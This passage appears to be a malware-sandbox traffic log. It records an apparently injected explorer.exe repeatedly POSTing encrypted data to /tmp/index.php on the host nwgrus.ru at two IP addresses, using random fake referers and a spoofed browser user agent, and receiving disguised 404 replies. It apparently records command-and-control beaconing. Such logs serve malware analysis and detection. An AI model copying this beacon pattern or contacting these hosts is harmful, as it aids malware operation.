Oct 13, 2024 17:03:12.156563044 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49864	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:12.166707039 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hnrmgadlbbkwfam.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 184 Host: nwgrus.ru
Oct 13, 2024 17:03:12.166743994 CEST	184	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 7d 55 fc fe Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu}UiO`aj{8gOaf`*}EPR'W9?(XADMG;yiM_H=Z=v
Oct 13, 2024 17:03:13.541337967 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49873	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:13.552712917 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wdfbqkdpkrjmiy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: nwgrus.ru
Oct 13, 2024 17:03:13.552731037 CEST	136	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 70 44 ee f1 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vupD}FxPhRIf8b/U`]\|Y4y
Oct 13, 2024 17:03:14.796607971 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49882	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:14.806333065 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atckbbeeuxiymh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: nwgrus.ru
Oct 13, 2024 17:03:14.808027029 CEST	308	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 59 3a e0 ba Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[*k,vuY:ACStt})}5:Rf{0&<G2TW\|C]+<`5^LUl~E)PH<,x7d%KnWj,[Gp
Oct 13, 2024 17:03:15.976577044 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49890	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:15.985131979 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cijofmhyocrj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: nwgrus.ru
Oct 13, 2024 17:03:15.985166073 CEST	308	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 6f 38 d5 e5 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[+k,vuo8Y6kdD! N_}\|n4[/!T^\XFBDQd-LeZ,>w]SRFB aqdq^yhXs[C
Oct 13, 2024 17:03:17.243900061 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49896	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:03:17.252623081 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mvcnjjhpwrjug.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: nwgrus.ru
Oct 13, 2024 17:03:17.252645016 CEST	135	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 55 06 aa 9e Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[(k,vuUtXoS~tMqxCz~{=kY_
Oct 13, 2024 17:03:18.610971928 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:03:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:26.627563000 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gjrfgywovwumgreo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: nwgrus.ru
Oct 13, 2024 17:04:26.627563000 CEST	274	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 49 dd 92 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu4Iy{Bk>ZG:;Kt#h_"P^G]CSk,3};81p^:\|ySX(GC"JERIlbz;EYW
Oct 13, 2024 17:04:28.029043913 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:32.911271095 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://duklicrioxv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: nwgrus.ru
Oct 13, 2024 17:04:32.911271095 CEST	156	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 0c ef e5 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuAi0z\<eR(=FDdLJ\5VouFs
Oct 13, 2024 17:04:34.140043020 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:38.182934999 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ukjjgoqtxsrmcmnl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nwgrus.ru
Oct 13, 2024 17:04:38.182967901 CEST	362	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5a bb e1 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu;Z}#\fe,X@%4[GcbH8;^$cyM'zn_V3J,"eBy-W<?t!lq_pD~gJCUw
Oct 13, 2024 17:04:39.391208887 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50041	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:43.323587894 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kevwooyenkvj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 307 Host: nwgrus.ru
Oct 13, 2024 17:04:43.326654911 CEST	307	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 29 b8 ad Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuw)\@YeHH[,$Pp-ETJNv695$Q:WMM\VW%@b@P]<{kvt$$'$
Oct 13, 2024 17:04:44.509438038 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50042	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:48.787045002 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kyqpufsslxgu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: nwgrus.ru
Oct 13, 2024 17:04:48.787079096 CEST	215	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 06 b2 82 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu2S"jd[_"\|E,z?;2UTvy%=0PS9((\|j6\|6}"XZ(:0^T7
Oct 13, 2024 17:04:50.069689035 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50043	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:04:54.553349972 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gtfiwdiocoxv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: nwgrus.ru
Oct 13, 2024 17:04:54.553381920 CEST	132	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 1e ec 8b Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuI5Qr>r;6a{a>~nx
Oct 13, 2024 17:04:55.759946108 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:04:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50044	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:00.282948971 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtloyxdgfedr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: nwgrus.ru
Oct 13, 2024 17:05:00.282968998 CEST	298	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 56 fc f7 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuV9mmv9@X*bjBXyzq/XDLW=[leM6s-.%q@],IU.PA~7/x-g,D1
Oct 13, 2024 17:05:01.475089073 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:05:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50045	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:05:06.197248936 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jrasjcgaikr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: nwgrus.ru
